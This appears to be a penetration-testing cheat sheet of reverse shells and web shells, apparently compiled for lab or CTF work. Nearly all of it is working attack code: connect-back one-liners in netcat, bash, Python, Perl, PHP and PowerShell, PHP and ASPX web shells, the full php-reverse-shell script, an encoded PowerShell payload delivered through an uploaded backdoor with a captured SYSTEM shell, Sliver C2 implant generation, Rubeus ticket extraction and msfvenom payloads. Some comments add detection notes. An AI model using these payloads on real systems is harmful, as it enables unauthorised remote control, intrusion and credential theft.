Reverse Shells
Helpful Links:
Kali Linux Specific Local Repositories:
Web Shells:
/usr/share/webshells
Powercat (Powershell Version of NetCat):
/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
Netcat
# Both forms run on the host being shelled and connect out to the hard-coded listener.
# The first needs a netcat build that supports -e (not every nc variant does).
# The second replaces -e with a FIFO at /tmp/f so sh -i's stdin/stdout/stderr are
# threaded through nc; the leftover /tmp/f is a forensic artifact on that host.
nc -e /bin/sh 192.168.45.215 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.215 443 >/tmp/f
Named Pipe Loop with Netcat
# Same named-pipe construction as the Netcat section above, only spaced for readability:
# cat feeds the FIFO into an interactive sh, whose combined output goes to nc, and nc's
# received bytes are written back into the FIFO. The FIFO is recreated each run.
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.45.215 443 > /tmp/f
Busybox Netcat
# BusyBox's nc applet takes host/port before -e, unlike the order used in the Netcat
# section above; behaviour is otherwise the same connect-back with sh attached.
busybox nc 192.168.45.215 443 -e /bin/sh
Java
// Groovy rather than plain Java: the list literal with an `as String[]` cast and the
// absent semicolons are Groovy syntax. Runs bash with fd 5 opened read/write on
// /dev/tcp/10.0.0.1/2002, then reads lines from that fd and executes each one with
// stdout/stderr redirected back to fd 5. The `\$line` escape stops Groovy from
// interpolating $line inside the double-quoted (GString) literal.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
// Blocks until the bash loop ends, i.e. until the connection is closed.
p.waitFor()
XTerm
# Reverse X11 session. The first line runs on the remote host and points an xterm at
# display :1 on 10.0.0.1; the next two run on the receiving host to start a nested X
# server on :1 and let the remote host connect to it. Display :1 listens on TCP 6001 and
# X11 traffic is unencrypted, so an outbound connection to that port is a clear signal.
xterm -display 10.0.0.1:1
Xnest :1
xhost +targetip
Bash Shell
# Pure-bash connect-back using the /dev/tcp pseudo-device, which only bash implements
# (it will not work under dash or sh). `>&` sends stdout and stderr to the connection and
# `0>&1` makes stdin read from it too. The first form wraps it in -c so it can be launched
# from a non-bash context; the second is the same redirection typed directly in bash.
/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.45.215/443 0>&1"
/usr/bin/bash -i >& /dev/tcp/192.168.45.215/443 0>&1
Python2 Reverse Shells
# Connect-back shell: open a TCP socket to the hard-coded listener and make it the
# process's stdin, stdout and stderr before running an interactive bash.
import socket
from subprocess import call
from os import dup2
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.27",1234))
# dup2 onto 0/1/2 so the child bash inherits the socket as its standard streams;
# the original descriptor behind `s` stays open as well.
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
# -i gives an interactive prompt; call() blocks until the shell exits.
# Host-side indicator: a bash whose fds 0-2 are a socket, with python as its parent.
call(["/bin/bash","-i"])
# The block above collapsed into a single `python -c` invocation (whichever interpreter
# `python` resolves to); the command line, including the listener address, is visible
# in the process list and in any command-line auditing for as long as it runs.
python -c 'import socket; from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.215",443)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);call(["/bin/bash","-i"])'
Python3 Reverse Shells
# Same idea as the Python 2 variant but without dup2: subprocess.call accepts raw
# file descriptors, so the socket is handed straight in as the child's stdin/stdout/stderr.
import socket, subprocess
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.27",1234))
# Spawns /bin/sh (not bash) and blocks until it exits.
subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
# One-line form of the Python 3 block above; as with the Python 2 one-liner, the full
# script and listener address are exposed on the command line while the shell runs.
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.243",1234));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
Python Shell Using Sudo
# Same Python connect-back, launched through `sudo -i -u scriptmanager` so the resulting
# bash runs as that account. It only works where sudoers allows the caller to run python
# as scriptmanager; a sudo rule granting an interpreter is effectively an unrestricted
# grant for that user and is the kind of entry worth auditing.
sudo -i -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Perl
# Perl connect-back: socket()/connect() to $i:$p, then open() dup's STDIN, STDOUT and
# STDERR onto the socket handle S before exec'ing sh -i. The exec only happens inside
# the if, so a failed connect() just exits quietly.
perl -e 'use Socket;$i="192.168.45.243";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP Script
# php-cli connect-back: fsockopen() opens the stream and the shell is told to use fd 3
# (`<&3 >&3 2>&3`). This assumes the new socket landed on descriptor 3, which holds only
# when php has no other extra descriptors open at that point — it is not guaranteed.
php -r '$sock=fsockopen("192.168.45.243",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
URL_Shell.php
<?php
// Minimal web shell: whatever arrives in the `cmd` request parameter is passed verbatim
// to system(). $_REQUEST merges GET, POST and (depending on request_order) cookie data,
// so any unauthenticated client that can reach this file gets command execution as the
// web-server account. `system($_REQUEST[` is a common string for file-based hunting.
system($_REQUEST['cmd']);
?>
PHP Reverse Shell
<?php
// Interactive connect-back shell in PHP: opens a TCP connection to $ip:$port, spawns
// $shell with proc_open(), then relays bytes between the socket and the child's
// stdin/stdout/stderr in a stream_select() loop until either side closes.
// This appears to be the widely circulated php-reverse-shell script; the
// `uname -a; w; id;` prelude in $shell and the printit() helper are recognisable
// strings for file-based detection.
// Lift PHP's execution-time cap so the relay loop can run indefinitely.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.27'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400; // bytes moved per fread() in the relay loop
$write_a = null;
$error_a = null;
// Command string handed to proc_open(); it runs through the system shell.
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection (30 second connect timeout)
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
// Relay loop: exits only when the socket or the child's stdout reaches EOF.
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
// (null timeout: block until at least one stream is readable)
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
// Tear down the socket, the three pipes and the child process.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Shell.aspx
<%@Page Language="C#"%><%var p=new System.Diagnostics.Process{StartInfo=
{FileName=Request["c"],UseShellExecute=false,RedirectStandardOutput=true}};p.Start();%>
<%-- Starts whatever executable the request parameter "c" names (no arguments are set)
     and echoes its stdout into the response. Any unauthenticated client that can reach
     this page gets execution under the IIS worker-process account; a Process/Request
     pairing like this in an .aspx under an upload directory is a web-shell indicator. --%>
<%=p.StandardOutput.ReadToEnd()%>
Powershell One-Liner
# Connect-back PowerShell loop: opens a TcpClient to the hard-coded address, reads up to
# 64 KiB per iteration (0..65535 buffer), runs the received text through iex
# (Invoke-Expression) and writes the output plus a "PS <cwd>> " prompt back on the same
# stream. Running iex on network-supplied input is exactly what script-block logging
# and AMSI-backed detections are designed to surface.
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.243',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Encoding Powershell One-Liner to Execute in Web Shell
pwsh
# Builds the -EncodedCommand form of the one-liner above. The script is held in a
# single-quoted literal, so the inner quotes are switched to double quotes.
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.215",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# powershell -enc expects UTF-16LE (Encoding.Unicode), not UTF-8, before base64.
# The resulting base64 blob is what shows up in process-creation and web-server logs.
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
# Print it for copy-paste.
$EncodedText
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
powershell -enc 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
Example of Executing in Shell via Previous Malicious File Upload
curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
kali@kali:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50603
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.50.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.50.254
PS C:\xampp\htdocs\meteor\uploads> whoami
nt authority\system
Creating and Executing Reverse Shell with Sliver C2 Framework
Installing Sliver
# NOTE(review): piping a remote installer straight into a root shell trusts sliver.sh,
# the TLS path and any CDN in between completely, and leaves no copy to inspect.
# Safer: download the script to a file first, check it against the project's published
# checksum or signature, read it, then run it.
sudo curl https://sliver.sh/install|sudo bash
Starting Sliver Service
systemctl start sliver.service
Running Sliver
sliver
Generating Reverse Shell Executable
generate --arch 64bit --os windows --mtls 10.10.16.12 --reconnect 60 --save shell.exe
Starting `mTLS` Server
mtls
Interacting with New Session
sessions -i <session_id>
Starting Socks5 Server
socks5 start
[*] Started SOCKS5 127.0.0.1 1081
⚠ In-band SOCKS proxies can be a little unstable depending on protocol
Uploading `shell.aspx` to Development Directory
cd C:\inetpub\development
upload shell.aspx
Installing Rubeus Module in Sliver
armory install rubeus
[*] Installing alias 'Rubeus' (v0.0.25) ... done!
Executing Rubeus
rubeus tgtdeleg /nowrap
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: lE6qVlr6UyAmBEAMEF8aFC9UVzE9UXfz5D/xdtbM5nw=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
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
Creating Reverse Shell with Metasploit
Start Metasploit
msfconsole
Shell Module
use /exploit/script/web_delivery
Configure Options
set options
lhost <attacker IP>
srvhost <attacker IP>
lport <port>
set target <scripting languages listed above>
set payload windows/meterpreter/reverse_tcp
run
MSFVENOM
Shellcode Generate
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.197 LPORT=1234 -f python -b "\x00\x20" -v shellcode
Shellcode Generate (with automatic retry)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.197 LPORT=1234 EXITFUNC=seh -f python -b "\x00\x20" -v shellcode
Catching a Meterpreter Shell
use windows/meterpreter/reverse_tcp
set lhost tun0
set lport 1234
set payload windows/meterpreter/reverse_tcp